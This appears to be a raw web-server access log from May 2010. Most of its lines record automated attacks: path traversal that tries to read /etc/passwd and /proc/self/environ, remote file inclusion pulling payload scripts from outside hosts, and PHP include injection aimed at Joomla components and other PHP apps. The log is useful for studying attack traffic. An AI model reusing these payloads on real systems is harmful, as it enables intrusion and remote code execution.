80.65.166.74 - - [24/May/2010:00:49:25 -0500] "GET ///index1.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
124.217.229.185 - - [24/May/2010:00:49:28 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:49:43 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:49:47 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
84.40.30.37 - - [24/May/2010:00:50:11 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:50:11 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:50:12 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:50:12 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:50:12 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:50:12 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
189.108.172.26 - - [24/May/2010:00:50:44 -0500] "GET /logs/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
189.108.172.26 - - [24/May/2010:00:50:45 -0500] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
124.217.229.185 - - [24/May/2010:00:51:18 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:51:19 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
84.40.30.37 - - [24/May/2010:00:51:33 -0500] "GET /logs/access_log.1271116800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:51:37 -0500] "GET /logs/access_log.1271116800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:00:51:50 -0500] "GET /logs/access_log.1207699200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
84.40.30.37 - - [24/May/2010:00:59:09 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:59:09 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:59:09 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:59:22 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:59:22 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:59:22 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
112.216.153.186 - - [24/May/2010:01:00:28 -0500] "GET /logs//ask_password.php?dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
112.216.153.186 - - [24/May/2010:01:00:28 -0500] "GET //ask_password.php?dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
112.216.153.186 - - [24/May/2010:01:00:29 -0500] "GET /logs/access_log.1266537600//ask_password.php?dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:01:01:22 -0500] "GET /logs/access_log.1209945600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.201.191 - - [24/May/2010:01:01:42 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.803"
91.121.201.191 - - [24/May/2010:01:01:43 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
112.216.153.186 - - [24/May/2010:01:02:59 -0500] "GET //ask_password.php?dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
112.216.153.186 - - [24/May/2010:01:03:04 -0500] "GET /logs/access_log.1238803200%20%20//ask_password.php?dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
112.216.153.186 - - [24/May/2010:01:03:04 -0500] "GET /logs//ask_password.php?dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
112.216.153.186 - - [24/May/2010:01:03:04 -0500] "GET /logs//ask_password.php?dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
112.216.153.186 - - [24/May/2010:01:03:04 -0500] "GET /logs/access_log.1238803200//ask_password.php?dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
112.216.153.186 - - [24/May/2010:01:03:04 -0500] "GET //ask_password.php?dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
189.108.172.26 - - [24/May/2010:01:03:32 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.ccwines.com/tmp/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
189.108.172.26 - - [24/May/2010:01:03:32 -0500] "GET /logs/access_log.1271548800//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.ccwines.com/tmp/id1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
189.108.172.26 - - [24/May/2010:01:03:35 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.ccwines.com/tmp/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:04:29 -0500] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:04:29 -0500] "GET /logs/access_log.1273363200%20%20/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:04:29 -0500] "GET /logs/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.46.195.239 - - [24/May/2010:01:04:32 -0500] "GET /logs/access_log.1265155200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [24/May/2010:01:04:35 -0500] "GET /logs/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:04:35 -0500] "GET /logs/access_log.1273363200%20%20/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:04:35 -0500] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:04:43 -0500] "GET /logs/access_log.1273363200%20%20/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:04:43 -0500] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:04:43 -0500] "GET /logs/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
174.133.201.194 - - [24/May/2010:01:04:51 -0500] "GET //?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.133.201.194 - - [24/May/2010:01:04:51 -0500] "GET /logs//?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 6786 "-""Mozilla/5.0"
174.133.201.194 - - [24/May/2010:01:04:51 -0500] "GET /logs/access_log.1270598400//?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
189.108.172.26 - - [24/May/2010:01:05:07 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
189.108.172.26 - - [24/May/2010:01:05:08 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
74.55.12.146 - - [24/May/2010:01:05:26 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:05:26 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:05:27 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:05:27 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
174.133.201.194 - - [24/May/2010:01:05:39 -0500] "GET //?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.133.201.194 - - [24/May/2010:01:05:39 -0500] "GET /logs//?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 6786 "-""Mozilla/5.0"
80.65.166.74 - - [24/May/2010:01:05:40 -0500] "GET /logs///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
74.55.12.146 - - [24/May/2010:01:05:40 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
80.65.166.74 - - [24/May/2010:01:05:40 -0500] "GET ///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
74.55.12.146 - - [24/May/2010:01:05:41 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:05:51 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:05:51 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
174.133.201.194 - - [24/May/2010:01:05:51 -0500] "GET /logs/access_log.1270598400//?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.73.226.100 - - [24/May/2010:01:06:59 -0500] "GET ////skin/board/moviefl/write.skin.php?g4[path]=http://christenplein.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.73.226.100 - - [24/May/2010:01:06:59 -0500] "GET /logs/access_log.1271721600////skin/board/moviefl/write.skin.php?g4[path]=http://christenplein.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
217.73.226.100 - - [24/May/2010:01:06:59 -0500] "GET /logs////skin/board/moviefl/write.skin.php?g4[path]=http://christenplein.com/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
217.73.226.100 - - [24/May/2010:01:06:59 -0500] "GET /logs/access_log.1272067200////skin/board/moviefl/write.skin.php?g4[path]=http://christenplein.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:11:35 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 200 6788 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:11:35 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:11:35 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:11:36 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:11:36 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 200 6788 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:11:36 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
121.190.102.21 - - [24/May/2010:01:13:42 -0500] "GET /skin/board/moviefl/download.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.190.102.21 - - [24/May/2010:01:13:42 -0500] "GET /logs/skin/board/moviefl/download.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [24/May/2010:01:13:42 -0500] "GET /logs/access_log.1272067200/skin/board/moviefl/download.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.190.102.21 - - [24/May/2010:01:13:42 -0500] "GET /logs/access_log.1270598400/skin/board/moviefl/download.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:14:14 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:14:14 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:14:14 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:14:32 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:14:32 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:14:32 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.109.108.186 - - [24/May/2010:01:15:41 -0500] "GET /logs/access_log.1271894400//uigaproxy/include/template.php?content=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
210.109.108.186 - - [24/May/2010:01:15:41 -0500] "GET /logs//uigaproxy/include/template.php?content=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.109.108.186 - - [24/May/2010:01:15:41 -0500] "GET //uigaproxy/include/template.php?content=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:16:04 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:16:37 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.109.108.186 - - [24/May/2010:01:16:41 -0500] "GET /logs/access_log.1272326400//uigaproxy/include/template.php?content=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
210.109.108.186 - - [24/May/2010:01:16:42 -0500] "GET /logs/access_log.1272240000//uigaproxy/include/template.php?content=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.46.204.244 - - [24/May/2010:01:17:02 -0500] "GET /logs/access_log.1192838400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [24/May/2010:01:17:11 -0500] "GET /logs/access_log.1257724800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [24/May/2010:01:17:28 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:17:28 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:18:09 -0500] "GET /logs/access_log.1271548800/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:18:15 -0500] "GET /logs/access_log.1271548800/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:01:18:23 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:18:27 -0500] "GET /logs/access_log.1271548800/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:51 -0500] "GET /logs/access_log.1271808000/2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:51 -0500] "GET /2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:51 -0500] "GET /logs/2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:51 -0500] "GET /logs/access_log.1264204800/2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:52 -0500] "GET /2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:52 -0500] "GET /logs/access_log.1271808000/2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:52 -0500] "GET /logs/2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:52 -0500] "GET /logs/access_log.1264204800/2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:55 -0500] "GET /2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:55 -0500] "GET /logs/2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:19:55 -0500] "GET /logs/access_log.1264204800/2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
